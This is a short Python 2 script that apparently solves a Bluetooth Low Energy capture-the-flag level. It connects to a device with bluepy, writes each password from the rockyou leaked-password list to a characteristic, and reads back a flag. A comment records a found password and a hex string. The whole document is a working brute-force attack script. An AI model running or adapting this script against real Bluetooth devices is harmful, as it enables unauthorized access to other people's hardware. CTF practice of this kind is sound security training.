#! /usr/bin/python import binascii import struct import sys, os, time import bluepy.btle as btle ''' 42 0x2A READ WRITE Enter password here. Use rockyou. 44 0x2C READ 46 0x2E READ WRITE write here to goto to scoreboard password1234 - eca7d1f3cf60a8b5344a ''' rockyou = "/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt" deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID(0x00FF) print ("Attached to peripheral") print("Loading level 02") hex1 = binascii.unhexlify(str('%0*x' % (4,2))) p.writeCharacteristic(0x30, hex1, withResponse=False) with open(rockyou) as f: for password in f: sys.stdout.write("\rTrying: %s " % password.rstrip()) response = p.writeCharacteristic(0x2A, password.rstrip(), withResponse=True) hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) if hexlif2 <> "": print "\rPassword Found: %s" % password.rstrip() print "Flag: %s" % hexlif2 break; p.disconnect()